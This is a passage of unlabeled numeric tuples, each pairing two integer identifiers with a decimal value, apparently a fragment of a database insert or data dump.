(252, 290039, 2.32339),
(252, 290040, 2.77661),
(252, 290041, 1.00331),
(252, 290042, 0.98),
(252, 290043, 1.05),
(252, 290044, 0.95669),
(252, 290045, 0.93331),
(252, 290046, 1.02669),
(252, 290047, 1.35331),
(252, 290048, 0.91),
(252, 290049, 1.00331),
(252, 290050, 0.98),
(252, 290051, 1.07331),
(253, 291190, 0.65338),
(253, 291191, 1.91338),
(253, 291192, 2.05338),
(253, 291193, 1.09669),
(253, 291194, 0.98),
(253, 291195, 0.95669),
(253, 291196, 1.09669),
(253, 291197, 1.16669),
(253, 291198, 0.98),
(253, 291199, 1.14331),
(253, 291200, 0.88669),
(253, 291201, 0.98),
(253, 291202, 0.88669),
(253, 291203, 0.95669),
(253, 291204, 0.95669),
(253, 291205, 1.05),
(253, 291206, 1.00331),
(253, 291207, 0.91),
(253, 291208, 1.05),
(253, 291209, 1.05),
(253, 291210, 1.05),
(253, 291211, 1.05),
(253, 291212, 1.02669),
(253, 291213, 1.16669),
(253, 291214, 1.26),
(253, 291215, 1.82),
(253, 291216, 1.02669),
(253, 291217, 1.02669),
(253, 291218, 0.88669),
(253, 291219, 0.95669),
(254, 292485, 0.93331),
(254, 292486, 0.86331),
(254, 292487, 1.07331),
(254, 292488, 0.91),
(254, 292489, 1.07331),
(254, 292490, 1.00331),
(254, 292491, 0.98),
(254, 292492, 1.05),
(254, 292493, 0.98),
(254, 292494, 0.23331),
(254, 292495, 0.95669),
(254, 292496, 1.07331),
(254, 292497, 1.09669),
(254, 292498, 1.02669),
(254, 292499, 0.93331),
(254, 292500, 1.09669),
(254, 292501, 0.86331),
(254, 292502, 0.95669),
(254, 292503, 0.91),
(254, 292504, 1.00331),
(254, 292505, 0.95669),
(254, 292506, 0.98),
(254, 292507, 0.91),
(254, 292508, 1.02669),
(254, 292509, 1.00331),
(254, 292510, 1.00331),
(254, 292511, 1.00331),
(254, 292512, 0.98),
(254, 292513, 1.05),
(254, 292514, 0.56),
(254, 292515, 1.07331),
(254, 292516, 1.16669),
(254, 292517, 0.23331),
(254, 292518, 0.91),
(254, 292519, 0.98),
(254, 292520, 0.28),
(254, 292521, 0.91),
(254, 292522, 0.95669),
(254, 292523, 0.93331),
(254, 292524, 1.00331),
(254, 292525, 1.02669),
(254, 292526, 1.12),
(254, 292527, 0.93331),
(254, 292528, 1.00331),
(254, 292529, 0.86331),
(254, 292530, 0.93331),
(254, 292531, 1.02669),
(254, 292532, 1.09669),
(254, 292533, 1.05),
(254, 292534, 1.02669),
(254, 292535, 0.93331),
(254, 292536, 1.05),
(254, 292537, 1.02669),
(254, 292538, 1.12),
(254, 292539, 0.98),
(254, 292540, 1.09669),
(255, 293035, 0.93331),
(255, 293036, 1.07331),
(255, 293037, 1.00331),
(305, 293037, 1.00331),
(255, 293038, 1.07331),
(255, 293039, 0.98),
(255, 293040, 1.07331),
(255, 293041, 1.00331),
(255, 293042, 1.26),
(255, 293043, 1.02669),
(255, 293044, 0.91),
(255, 293045, 1.00331),
(255, 293046, 0.93331),
(306, 293046, 0.93331),
(255, 293047, 1.02669),
(255, 293048, 0.93331),
(255, 293049, 1.00331),
(255, 293050, 1.07331),
(255, 293051, 0.95669),
(255, 293052, 1.07331),
(255, 293053, 1.07331),
(255, 293054, 1.07331),
(255, 293055, 0.95669),
(255, 293056, 1.02669),
(255, 293057, 1.02669),
(255, 293058, 1.00331),
(255, 293059, 1.02669),
(255, 293060, 0.98),
(255, 293061, 1.19),
(255, 293062, 1.28331),
(255, 293063, 0.91),
(255, 293064, 1.00331),
(255, 293065, 1.05),
(255, 293066, 0.7),
(255, 293067, 1.16669),
(255, 293068, 1.23669),
(255, 293069, 1.02669),
(255, 293070, 1.07331),
(255, 293071, 0.93331),
(255, 293072, 1.12),
(255, 293073, 0.95669),
(255, 293074, 1.82),
(255, 293075, 1.00331),
(255, 293076, 1.00331),
(256, 293703, 0.93331),
(256, 293704, 1.05),
(256, 293705, 0.88669),
(256, 293706, 0.93331),
(256, 293707, 0.88669),
(256, 293708, 0.95669),
(256, 293709, 0.93331),
(256, 293710, 1.02669),
(256, 293711, 0.98),
(256, 293712, 0.98),
(256, 293713, 0.23331),
(256, 293714, 0.88669),
(256, 293715, 1.09669),
(256, 293716, 0.88669),
(256, 293717, 0.98),
(256, 293718, 1.00331),
(256, 293719, 0.95669),
(256, 293720, 1.07331),
(256, 293721, 2.05338),
(256, 293722, 0.98),
(256, 293723, 0.95669),
(256, 293724, 1.02669),
(256, 293725, 1.07331),
(256, 293726, 1.02669),
(256, 293727, 1.00331),
(256, 293728, 1.07331),
(256, 293729, 0.95669),
(256, 293730, 0.95669),
(256, 293731, 3.08007),
(256, 293732, 1.02669),
(256, 293733, 1.00331),
(256, 293734, 1.02669),
(256, 293735, 0.98),
(256, 293736, 0.95669),
(256, 293737, 0.18669),
(256, 293738, 0.91),
(256, 293739, 1.02669),
(257, 294671, 1.00331),
(257, 294672, 1.09669),
(257, 294673, 0.88669),
(290, 294673, 0.88669),
(257, 294674, 0.95669),
(290, 294674, 0.95669),
(257, 294675, 1.02669),
(257, 294676, 1.00331),
(257, 294677, 2.14662),
(257, 294678, 1.02669),
(257, 294679, 0.93331),
(257, 294680, 1.07331),
(257, 294681, 0.98),
(257, 294682, 0.93331),
(257, 294683, 1.02669),
(257, 294684, 1.82),
(257, 294685, 2.1),
(257, 294686, 0.95669),
(257, 294687, 1.16669),
(257, 294688, 0.98),
(257, 294689, 0.86331),
(257, 294690, 1.00331),
(257, 294691, 0.98),
(257, 294692, 1.07331),
(257, 294693, 0.88669),
(257, 294694, 0.98),
(257, 294695, 1.07331),
(257, 294696, 1.07331),
(257, 294697, 1.09669),
(257, 294698, 1.02669),
(257, 294699, 1.07331),
(257, 294700, 1.05),
(257, 294701, 1.16669),
(257, 294702, 1.02669),
(257, 294703, 0.46669),
(257, 294704, 1.12),
(257, 294705, 1.21331),
(257, 294706, 1.21331),
(258, 295793, 0.86331),
(258, 295794, 0.93331),
(258, 295795, 0.95669),
(258, 295796, 0.88669),
(258, 295797, 0.95669),
(258, 295798, 1.72662),
(258, 295799, 1.09669),
(258, 295800, 0.95669),
(258, 295801, 0.88669),
(258, 295802, 0.95669),
(258, 295803, 0.95669),
(258, 295804, 1.05),
(258, 295805, 1.02669),
(258, 295806, 1.05),
(258, 295807, 1.02669),
(292, 295807, 1.02669),
(258, 295808, 1.72662),
(258, 295809, 1.96),
(258, 295810, 0.98),
(258, 295811, 0.98),
(258, 295812, 1.12),
(258, 295813, 0.95669),
(292, 295813, 1.91338),
(258, 295814, 0.93331),
(292, 295814, 0.93331),
(258, 295815, 0.98),
(292, 295815, 0.98),
(258, 295816, 0.93331),
(258, 295817, 1.09669),
(258, 295818, 0.91),
(258, 295819, 1.02669),
(258, 295820, 0.95669),
(292, 295820, 1.91338),
(258, 295821, 1.00331),
(258, 295822, 1.12),
(258, 295823, 0.91),
(258, 295824, 1.00331),
(258, 295825, 0.93331),
(258, 295826, 1.00331),
(258, 295827, 0.95669),
(258, 295828, 1.07331),
(258, 295829, 0.98),
(258, 295830, 0.95669),
(258, 295831, 1.12),
(261, 296875, 1.05),
(261, 296876, 1.07331),
(261, 296877, 1.02669),
(261, 296878, 0.95669),
(261, 296879, 1.07331),
(261, 296880, 0.88669),
(261, 296881, 1.07331),
(261, 296882, 1.05),
(261, 296883, 1.12),
(261, 296884, 0.86331),
(261, 296885, 0.93331),
(261, 296886, 1.07331),
(261, 296887, 1.37669),
(261, 296888, 1.12),
(261, 296889, 1.16669),
(261, 296890, 1.00331),
(261, 296891, 1.12),
(261, 296892, 0.91),
(261, 296893, 1.00331),
(261, 296894, 2.00662),
(261, 296895, 1.07331),
(261, 296896, 1.09669),
(261, 296897, 0.93331),
(261, 296898, 1.05),
(261, 296899, 1.02669),
(261, 296900, 2.05338),
(261, 296901, 1.05),
(261, 296902, 0.91),
(306, 296902, 0.91),
(261, 296903, 1.14331),
(261, 296904, 0.93331),
(261, 296905, 1.16669),
(261, 296906, 1.21331),
(261, 296907, 1.09669),
(261, 296908, 0.95669),
(261, 296909, 1.12),
(261, 296910, 0.86331),
(261, 296911, 0.98),
(261, 296912, 1.00331),
(261, 296913, 1.00331),
(261, 296914, 1.09669),
(261, 296915, 3.15),
(261, 296916, 1.23669),
(261, 296917, 1.12),
(261, 296918, 1.16669),
(261, 296919, 1.14331),
(261, 296920, 1.02669),
(261, 296921, 1.16669),
(261, 296922, 0.98),
(261, 296923, 1.19),
(261, 296924, 1.12),
(261, 296925, 1.02669),
(261, 296926, 1.21331),
(261, 296927, 1.12),
(261, 296928, 1.23669),
(261, 296929, 0.93331),
(261, 296930, 1.05),
(261, 296982, 0.98),
(261, 296983, 1.23669),
(261, 296984, 0.88669),
(261, 296985, 1.00331),
(262, 298212, 1.12),
(262, 298213, 0.95669),
(262, 298214, 1.12),
(262, 298215, 0.95669),
(262, 298216, 1.02669),
(262, 298217, 0.65331),
(262, 298218, 1.19),
(262, 298219, 1.35331),
(262, 298220, 0.98),
(262, 298221, 1.02669),
(262, 298222, 0.95669),
(262, 298223, 1.02669),
(262, 298224, 1.02669),
(262, 298225, 1.12),
(262, 298226, 0.98),
(262, 298227, 1.14331),
(262, 298228, 0.91),
(262, 298229, 1.05),
(262, 298230, 1.96),
(262, 298231, 0.91),
(262, 298232, 1.09669),
(262, 298233, 0.93331),
(262, 298234, 0.95669),
(262, 298235, 1.07331),
(262, 298236, 1.02669),
(262, 298237, 0.88669),
(262, 298238, 0.98),
(262, 298239, 0.93331),
(262, 298240, 1.12),
(262, 298241, 2.14662),
(262, 298242, 1.14331),
(262, 298243, 0.95669),
(288, 298243, 0.95669),
(262, 298244, 1.05),
(262, 298245, 0.93331),
(262, 298246, 1.02669),
(262, 298247, 1.00331),
(262, 298248, 1.19),
(262, 298249, 0.95669),
(262, 298250, 1.05),
(262, 298251, 0.98),
(262, 298252, 1.09669),
(262, 298253, 0.98),
(262, 298254, 1.07331),
(262, 298255, 0.98),
(262, 298256, 1.07331),
(262, 298257, 0.93331),
(262, 298258, 1.07331),
(262, 298259, 1.05),
(262, 298260, 1.16669),
(262, 298261, 0.91),
(262, 298262, 1.00331),
(262, 298263, 0.91),
(262, 298264, 1.00331),
(262, 298265, 0.91),
(262, 298266, 0.98),
(262, 298267, 0.93331),
(262, 298268, 1.02669),
(262, 298269, 1.12),
(262, 298270, 0.93331),
(262, 298271, 1.00331),
(262, 298272, 1.05),
(262, 298273, 1.12),
(262, 298274, 1.12),
(262, 298275, 1.07331),
(262, 298276, 1.19),
(262, 298277, 0.98),
(262, 298278, 1.12),
(263, 300036, 0.91),
(263, 300037, 1.12),
(263, 300038, 1.05),
(263, 300039, 0.86331),
(263, 300040, 1.07331),
(263, 300041, 0.93331),
(263, 300042, 1.00331),
(263, 300043, 1.14331),
(263, 300044, 0.56),
(263, 300045, 0.93331),
(263, 300046, 1.05),
(263, 300047, 0.95669),
(263, 300048, 1.07331),
(263, 300049, 0.98007),
(263, 300050, 0.98),
(263, 300051, 1.09669),
(263, 300052, 0.95669),
(263, 300053, 1.05),
(263, 300054, 1.02669),
(263, 300055, 1.09669),
(263, 300056, 1.05),
(263, 300057, 1.05),
(263, 300058, 1.02669),
(263, 300059, 0.98),
(263, 300060, 1.23669),
(263, 300061, 1.12),
(263, 300062, 0.93331),
(263, 300063, 1.02669),
(263, 300064, 0.91),
(306, 300064, 0.91),
(263, 300065, 1.12),
(263, 300066, 0.88669),
(263, 300067, 0.95669),
(263, 300068, 0.86331),
(263, 300069, 1.19),
(263, 300070, 0.88669),
(263, 300071, 1.14331),
(263, 300072, 1.12),
(263, 300073, 1.21331),
(263, 300074, 1.00331),
(263, 300075, 1.05),
(263, 300076, 0.95669),
(263, 300077, 1.19),
(263, 300078, 1.96),
(263, 300079, 1.12),
(263, 300080, 1.09669),
(263, 300081, 1.35331),
(264, 300786, 0.88669),
(264, 300787, 1.07331),
(264, 300788, 0.93331),
(264, 300789, 1.02669),
(264, 300790, 1.00331),
(264, 300791, 0.98),
(264, 300792, 1.07331),
(264, 300793, 1.09669),
(264, 300794, 1.12),
(264, 300795, 1.30669),
(264, 300796, 1.21331),
(264, 300797, 1.02669),
(264, 300798, 1.07331),
(264, 300799, 1.07331),
(264, 300800, 0.93331),
(264, 300801, 1.02669),
(264, 300802, 0.98),
(264, 300803, 1.19),
(264, 300804, 1.12),
(264, 300805, 1.21331),
(264, 300806, 0.86331),
(264, 300807, 0.98),
(264, 300808, 0.95669),
(264, 300809, 1.14331),
(267, 301453, 0.95669),
(267, 301454, 1.12),
(267, 301455, 2.66007),
(267, 301456, 1.96),
(267, 301457, 1.05),
(267, 301458, 0.98),
(267, 301459, 1.07331),
(267, 301460, 1.05),
(267, 301461, 1.14331),
(267, 301462, 0.95669),
(267, 301463, 1.07331),
(267, 301464, 0.95669),
(267, 301465, 0.95669),
(267, 301466, 1.12),
(267, 301467, 1.23669),
(267, 301468, 0.95669),
(267, 301469, 0.95669),
(267, 301470, 1.05),
(267, 301471, 1.05),
(267, 301472, 0.95669),
(267, 301473, 1.07331),
(267, 301474, 0.95669),
(267, 301475, 1.14331),
(267, 301476, 0.95669),
(267, 301477, 1.02669),
(267, 301478, 0.91),
(267, 301479, 1.05),
(267, 301480, 1.07331),
(267, 301481, 1.12),
(267, 301482, 1.02669),
(267, 301483, 0.95669),
(267, 301484, 0.98),
(267, 301485, 1.12),
(267, 301486, 0.91),
(267, 301487, 1.00331),
(267, 301488, 0.93331),
(267, 301489, 1.05),
(267, 301490, 0.93331),
(267, 301491, 1.19),
(267, 301492, 0.98),
(267, 301493, 1.19),
(267, 301494, 0.91),
(290, 301494, 0.91),
(267, 301495, 1.02669),
(268, 302574, 1.02669),
(268, 302575, 0.93331),
(268, 302576, 1.02669),
(268, 302577, 3.00993),
(268, 302578, 1.00331),
(268, 302579, 1.02669),
(268, 302580, 0.93331),
(268, 302581, 1.09669),
(268, 302582, 1.12),
(268, 302583, 0.88669),
(306, 302583, 0.88669),
(268, 302584, 0.98),
(268, 302585, 0.91),
(304, 302585, 0.91),
(268, 302586, 1.00331),
(304, 302586, 1.00331),
(268, 302587, 0.88669),
(268, 302588, 0.98),
(268, 302589, 0.86331),
(268, 302590, 1.05),
(268, 302591, 0.93331),
(268, 302592, 1.02669),
(268, 302593, 0.95669),
(268, 302594, 0.88669),
(268, 302595, 0.95669),
(268, 302596, 1.09669),
(268, 302597, 0.91),
(268, 302598, 1.07331),
(268, 302599, 0.93331),
(268, 302600, 0.93331),
(268, 302601, 1.02669),
(268, 302602, 0.65338),
(268, 302603, 1.00331),
(268, 302604, 1.12),
(268, 302605, 0.91),
(268, 302606, 1.02669),
(268, 302607, 0.32669),
(268, 302608, 0.98),
(268, 302609, 1.05),
(268, 302610, 0.86331),
(268, 302611, 0.95669),
(268, 302612, 2.87007),
(268, 302613, 1.00331),
(268, 302614, 1.16669),
(268, 302615, 1.07331),
(268, 302616, 1.12),
(268, 302617, 1.00331),
(268, 302618, 1.00331),
(268, 302619, 1.07331),
(268, 302620, 1.00331),
(268, 302621, 1.12),
(268, 302622, 0.93331),
(268, 302623, 1.02669),
(268, 302624, 0.88669),
(268, 302625, 0.93331),
(268, 302626, 1.05),
(268, 302627, 1.14331),
(268, 302628, 3.7331),
(268, 302629, 1.02669),
(268, 302630, 1.12),
(268, 302631, 0.98),
(268, 302632, 1.07331),
(268, 302633, 1.07331),
(268, 302634, 1.19),
(268, 302635, 1.02669),
(268, 302636, 1.07331),
(268, 302637, 0.98),
(268, 302638, 1.12),
(268, 302639, 0.95669),
(268, 302640, 1.05),
(268, 302641, 0.95669),
(268, 302642, 1.02669),
(268, 302643, 1.00331),
(268, 302644, 1.05),
(268, 302645, 1.00331),
(268, 302646, 1.21331),
(268, 302647, 0.98),
(268, 302648, 1.12),
(268, 302649, 0.23331),
(268, 302650, 0.93331),
(268, 302651, 1.02669),
(268, 302652, 0.95669),
(268, 302653, 1.07331),
(268, 302704, 0.86331),
(268, 302705, 1.12),
(269, 303446, 1.86662),
(269, 303447, 0.98),
(269, 303448, 1.07331),
(269, 303449, 0.91),
(269, 303450, 1.02669),
(269, 303451, 0.91),
(269, 303452, 0.95669),
(269, 303453, 1.09669),
(269, 303454, 1.00331),
(269, 303455, 1.12),
(269, 303456, 0.95669),
(269, 303457, 1.12),
(269, 303458, 0.91),
(269, 303459, 1.12),
(269, 303460, 0.84),
(269, 303461, 1.00331),
(269, 303462, 0.93331),
(269, 303463, 1.02669),
(269, 303464, 1.72662),
(269, 303465, 1.86662),
(269, 303466, 0.84),
(269, 303467, 0.95669),
(269, 303468, 1.07331),
(269, 303469, 0.95669),
(269, 303470, 1.05),
(269, 303471, 1.00331),
(269, 303472, 0.95669),
(269, 303473, 1.02669),
(269, 303474, 2.14662),
(269, 303475, 0.88669),
(269, 303476, 1.00331),
(269, 303477, 0.95669),
(269, 303478, 1.09669),
(269, 303479, 1.00331),
(269, 303480, 1.12),
(269, 303481, 0.91),
(269, 303482, 1.14331),
(269, 303483, 1.19),
(274, 304657, 1.05),
(274, 304658, 0.88669),
(274, 304659, 0.95669),
(274, 304660, 1.09669),
(274, 304661, 0.91),
(274, 304662, 0.86331),
(274, 304663, 0.93331),
(274, 304664, 0.93331),
(274, 304665, 0.86331),
(274, 304666, 1.09669),
(274, 304667, 1.00331),
(274, 304668, 1.09669),
(274, 304669, 1.00331),
(306, 304669, 1.00331),
(274, 304670, 1.02669),
(274, 304671, 1.12),
(274, 304672, 1.14331),
(274, 304673, 0.86331),
(274, 304674, 0.95669),
(274, 304675, 1.02669),
(274, 304676, 1.00331),
(274, 304677, 1.00331),
(274, 304678, 0.88669),
(274, 304679, 1.05),
(274, 304680, 1.16669),
(274, 304681, 0.84),
(274, 304682, 1.09669),
(274, 304683, 1.09669),
(275, 305497, 1.00331),
(275, 305498, 1.19),
(290, 305499, 0.88669),
(306, 305499, 0.88669),
(275, 305499, 1.77338),
(275, 305500, 1.05),
(275, 305501, 1.00331),
(275, 305502, 0.98),
(275, 305503, 0.95669),
(275, 305504, 1.02669),
(275, 305505, 1.00331),
(275, 305506, 0.88669),
(275, 305507, 0.98),
(275, 305508, 1.00331),
(275, 305509, 1.00331),
(275, 305510, 1.12),
(275, 305511, 0.95669),
(275, 305512, 1.07331),
(275, 305513, 0.91),
(275, 305514, 1.00331),
(275, 305515, 0.93331),
(275, 305516, 1.00331),
(275, 305517, 0.98),
(275, 305518, 1.02669),
(275, 305519, 1.00331),
(275, 305520, 1.16669),
(275, 305521, 0.91),
(275, 305522, 1.16669),
(275, 305523, 2.98688),
(275, 305524, 8.74688),
(275, 305525, 10.6669),
(275, 305526, 0.91),
(275, 305527, 0.98),
(275, 305528, 1.02669),
(275, 305529, 1.00331),
(275, 305530, 1.23669),
(275, 305531, 1.05),
(275, 305532, 1.21331),
(275, 305533, 1.12),
(275, 305534, 1.30669),
(275, 305535, 0.42),
(275, 305536, 0.98),
(275, 305537, 1.07331),
(275, 305538, 0.91),
(275, 305539, 0.98),
(275, 305540, 0.93331),
(275, 305541, 1.05),
(287, 313007, 0.98),
(287, 313008, 1.09669),
(287, 313009, 0.81669),
(287, 313010, 1.00331),
(287, 313011, 1.09669),
(288, 313909, 0.32669),
(288, 313910, 0.93331),
(288, 313911, 1.02669),
(288, 313912, 1.02669),
(288, 313913, 1.19),
(288, 313914, 0.88669),
(288, 313915, 0.98),
(288, 313916, 1.00331),
(288, 313917, 0.98),
(288, 313918, 1.14331),
(288, 313919, 0.93331),
(288, 313920, 1.02669),
(288, 313921, 1.00331),
(288, 313922, 1.09669),
(288, 313923, 0.98),
(288, 313924, 1.07331),
(288, 313925, 0.91),
(288, 313926, 0.98),
(288, 313927, 1.02669),
(288, 313928, 0.88669),
(288, 313929, 1.02669),
(288, 313930, 1.05),
(288, 313931, 1.14331),
(288, 313932, 1.26),
(288, 313933, 0.91),
(288, 313934, 1.02669),
(288, 313935, 0.95669),
(288, 313936, 0.95669),
(288, 313937, 1.00331),
(288, 313938, 1.02669),
(288, 313939, 1.02669),
(288, 313940, 1.05),
(288, 313941, 2.43661),
(288, 313942, 1.00331),
(288, 313943, 0.95669),
(288, 313944, 0.93331),
(288, 313945, 0.95669),
(288, 313946, 1.00331),
(288, 313947, 1.00331),
(288, 313948, 1.02669),
(288, 313949, 1.09669),
(288, 313950, 1.02669),
(288, 313951, 0.98),
(288, 313952, 0.91),
(288, 313953, 0.98),
(288, 313954, 0.98),
(288, 313955, 1.07331),
(290, 315809, 0.95669),
(290, 315810, 1.82),
(290, 315811, 1.96),
(290, 315812, 0.91),
(290, 315813, 1.02669),
(290, 315814, 1.12),
(290, 315815, 0.88669),
(290, 315816, 1.07331),
(290, 315817, 0.88669),
(290, 315818, 0.95669),
(290, 315819, 0.91),
(290, 315820, 1.00331),
(290, 315821, 1.02669),
(290, 315822, 1.14331),
(290, 315823, 0.93331),
(290, 315824, 1.05),
(290, 315825, 0.93331),
(290, 315826, 1.09669),
(290, 315827, 1.00331),
(290, 315828, 3.54676),
(290, 315829, 1.02669),
(290, 315830, 1.96),
(290, 315831, 1.00331),
(290, 315832, 0.95669),
(290, 315833, 1.05),
(290, 315834, 1.05),
(290, 315835, 0.88669),
(290, 315836, 0.98),
(290, 315837, 1.12),
(292, 318091, 0.88669),
(306, 318091, 0.88669),
(292, 318092, 0.95669),
(306, 318092, 0.95669),
(292, 318093, 0.95669),
(292, 318094, 1.02669),
(292, 318095, 0.88669),
(292, 318096, 0.95669),
(292, 318097, 1.00331),
(292, 318098, 1.09669),
(292, 318099, 0.37331),
(292, 318100, 1.00331),
(292, 318101, 1.09669),
(292, 318102, 0.98),
(292, 318103, 0.84),
(292, 318104, 0.98),
(292, 318105, 0.86331),
(292, 318106, 0.95669),
(292, 318107, 0.93331),
(292, 318108, 1.05),
(292, 318109, 1.02669),
(292, 318110, 1.12),
(292, 318111, 0.93331),
(292, 318112, 0.95669),
(292, 318113, 1.00331),
(292, 318114, 0.93331),
(292, 318115, 1.77338),
(292, 318116, 0.98),
(292, 318117, 0.95669),
(292, 318118, 0.91),
(292, 318119, 0.95669),
(292, 318120, 0.95669),
(292, 318121, 1.05),
(292, 318122, 1.16669),
(292, 318123, 0.98),
(292, 318124, 1.00331),
(292, 318125, 1.00331),
(292, 318126, 1.05),
(292, 318127, 1.16669),
(292, 318128, 0.98),
(292, 318129, 1.14331),
(292, 318130, 1.00331),
(292, 318131, 1.14331),
(292, 318132, 1.21331),
(292, 318133, 0.95669),
(292, 318134, 1.09669),
(292, 318135, 0.32669),
(292, 318136, 1.02669),
(292, 318137, 1.14331),
(295, 318828, 0.98),
(295, 318829, 1.14331),
(295, 318830, 0.95669),
(295, 318831, 1.00331),
(295, 318832, 1.19),
(295, 318833, 0.28),
(295, 318834, 0.98),
(295, 318835, 1.07331),
(295, 318836, 1.4),
(295, 318837, 1.4),
(298, 320430, 1.00331),
(308, 320430, 1.00331),
(298, 320431, 2.60661),
(308, 320431, 2.60661),
(298, 320432, 0.95669),
(308, 320432, 0.95669),
(298, 320433, 1.05),
(308, 320433, 1.05),
(298, 320434, 1.02669),
(304, 320434, 1.02669),
(308, 320434, 1.02669),
(298, 320435, 1.16669),
(304, 320435, 1.16669),
(298, 320436, 1.00331),
(308, 320436, 1.00331),
(298, 320437, 1.00331),
(308, 320437, 1.00331),
(298, 320438, 0.98),
(308, 320438, 0.98),
(298, 320439, 1.09669),
(308, 320439, 1.09669),
(298, 320440, 1.02669),
(308, 320440, 1.02669),
(298, 320441, 1.12),
(308, 320441, 1.12),
(298, 320442, 0.98),
(308, 320442, 0.98),
(298, 320443, 1.07331),
(298, 320444, 1.00331),
(308, 320444, 1.00331),
(298, 320445, 1.12),
(308, 320445, 1.12),
(299, 321591, 1.02669),
(299, 321592, 0.18669),
(299, 321593, 0.86331),
(299, 321594, 0.98),
(299, 321595, 0.91),
(306, 321595, 0.91),
(299, 321596, 1.00331),
(299, 321597, 0.91),
(299, 321598, 1.00331),
(299, 321599, 0.93331),
(299, 321600, 1.02669),
(299, 321601, 0.95669),
(299, 321602, 1.02669),
(299, 321603, 0.91),
(299, 321604, 1.05),
(299, 321605, 0.88669),
(299, 321606, 1.07331),
(299, 321607, 8.73981),
(299, 321608, 0.88669),
(299, 321609, 0.95669),
(299, 321610, 0.86331),
(299, 321611, 1.05),
(299, 321612, 0.95669),
(299, 321613, 1.05),
(299, 321614, 0.84),
(299, 321615, 0.91),
(299, 321616, 1.00331),
(299, 321617, 1.00331),
(299, 321618, 0.32669),
(299, 321619, 1.07331),
(299, 321620, 1.14331),
(299, 321621, 0.95669),
(299, 321622, 1.00331),
(299, 321623, 1.00331),
(299, 321624, 1.07331),
(299, 321625, 1.02669),
(299, 321626, 1.02669),
(299, 321627, 0.88669),
(299, 321628, 1.02669),
(299, 321629, 1.05),
(299, 321630, 1.00331),
(299, 321631, 1.14331),
(299, 321632, 0.95669),
(299, 321633, 1.12),
(299, 321634, 0.93331),
(299, 321635, 1.02669),
(299, 321636, 1.00331),
(299, 321637, 0.95669),
(299, 321638, 1.02669),
(299, 321639, 1.02669),
(299, 321640, 1.00331),
(299, 321641, 0.28),
(299, 321642, 0.91),
(299, 321643, 1.00331),
(304, 325474, 1.00331),
(304, 325475, 0.28),
(304, 325476, 0.95669),
(304, 325477, 1.23669),
(304, 325478, 1.02669),
(304, 325479, 1.02669),
(304, 325480, 1.05),
(304, 325481, 0.98),
(304, 325482, 1.05),
(304, 325483, 1.02669),
(304, 325484, 1.12),
(304, 325485, 1.02669),
(304, 325486, 1.12),
(304, 325487, 1.00331),
(304, 325488, 1.12),
(304, 325489, 1.00331),
(304, 325490, 0.95669),
(304, 325491, 1.07331),
(304, 325492, 0.23331),
(304, 325493, 0.91),
(304, 325494, 1.00331),
(304, 325495, 0.95669),
(304, 325496, 1.02669),
(304, 325497, 1.14331),
(304, 325498, 0.91),
(304, 325499, 1.09669),
(304, 325500, 0.93331),
(304, 325501, 1.02669),
(304, 325502, 0.93331),
(304, 325503, 1.16669),
(304, 325504, 1.09669),
(304, 325505, 1.14331),
(304, 325506, 0.28),
(304, 325507, 0.91),
(304, 325508, 0.95669),
(304, 325509, 0.98),
(304, 325510, 0.93331),
(304, 325511, 0.98),
(304, 325512, 0.93331),
(304, 325513, 1.02669),
(304, 325514, 1.00331),
(304, 325515, 1.07331),
(304, 325516, 1.09669),
(304, 325517, 1.28331),
(305, 326712, 0.91),
(305, 326713, 0.98),
(305, 326714, 0.88669),
(305, 326715, 1.00331),
(305, 326716, 0.98),
(305, 326717, 0.98),
(305, 326718, 0.95669),
(305, 326719, 0.86331),
(305, 326720, 1.00331),
(305, 326721, 1.05),
(305, 326722, 1.05),
(305, 326723, 0.98),
(305, 326724, 1.05),
(305, 326725, 0.91),
(305, 326726, 1.09669),
(305, 326727, 0.95669),
(305, 326728, 0.95669),
(305, 326729, 1.12),
(305, 326730, 0.91),
(305, 326731, 1.00331),
(305, 326732, 0.32669),
(305, 326733, 0.93331),
(305, 326734, 1.02669),
(305, 326735, 0.91),
(305, 326736, 1.02669),
(305, 326737, 1.02669),
(305, 326738, 1.00331),
(305, 326739, 1.00331),
(305, 326740, 0.91),
(305, 326741, 0.98),
(305, 326742, 1.12),
(305, 326743, 1.02669),
(305, 326744, 0.88669),
(305, 326745, 0.95669),
(305, 326746, 0.42),
(305, 326747, 0.98),
(305, 326748, 1.21331),
(305, 326749, 0.84),
(305, 326750, 0.93331),
(305, 326751, 0.84),
(305, 326752, 0.93331),
(305, 326753, 0.84),
(305, 326754, 0.95669),
(305, 326755, 0.98),
(305, 326756, 0.98),
(305, 326757, 0.95669),
(305, 326758, 0.98),
(305, 326759, 0.98),
(305, 326760, 0.95669),
(305, 326761, 1.26),
(305, 326762, 0.23331),
(305, 326763, 0.86331),
(305, 326764, 0.98),
(306, 328405, 0.04669),
(306, 328406, 0.86331),
(306, 328407, 1.05),
(306, 328408, 0.98),
(306, 328409, 0.37331),
(306, 328410, 1.07331),
(306, 328411, 0.91),
(306, 328412, 0.98),
(306, 328413, 0.91),
(306, 328414, 1.02669),
(306, 328415, 0.98),
(306, 328416, 1.02669),
(306, 328417, 1.12),
(306, 328418, 0.98),
(306, 328419, 1.16669),
(306, 328420, 1.00331),
(306, 328421, 1.02669),
(306, 328422, 0.91),
(306, 328423, 1.00331),
(306, 328424, 1.09669),
(306, 328425, 0.95669),
(306, 328426, 1.05),
(306, 328427, 0.95669),
(306, 328428, 0.91),
(306, 328429, 0.86331),
(306, 328430, 0.95669),
(306, 328431, 0.93331),
(306, 328432, 1.00331),
(306, 328433, 0.95669),
(306, 328434, 1.02669),
(306, 328435, 1.00331),
(306, 328436, 0.95669),
(306, 328437, 1.02669),
(306, 328438, 1.02669),
(306, 328439, 1.07331),
(306, 328440, 1.00331),
(306, 328441, 1.12),
(306, 328442, 1.26),
(306, 328443, 0.95669),
(306, 328444, 1.05),
(306, 328445, 0.98),
(306, 328446, 1.05),
(306, 328447, 0.95669),
(306, 328448, 1.09669),
(306, 328449, 1.86662),
(306, 328450, 1.96),
(306, 328451, 0.93331),
(306, 328452, 1.00331),
(306, 328453, 1.07331),
(306, 328454, 0.98),
(306, 328455, 0.88669),
(306, 328456, 0.98),
(306, 328457, 1.09669),
(306, 328458, 1.72662),
(306, 328459, 1.00331),
(306, 328460, 0.93331),
(306, 328461, 1.05),
(306, 328462, 1.12),
(306, 328463, 0.93331),
(306, 328464, 1.07331),
(306, 328465, 0.93331),
(306, 328466, 1.05),
(306, 328467, 0.91),
(306, 328468, 1.00331),
(306, 328469, 1.68),
(306, 328470, 0.93331),
(306, 328471, 0.95669),
(306, 328472, 0.98),
(306, 328473, 1.07331),
(306, 328474, 0.91),
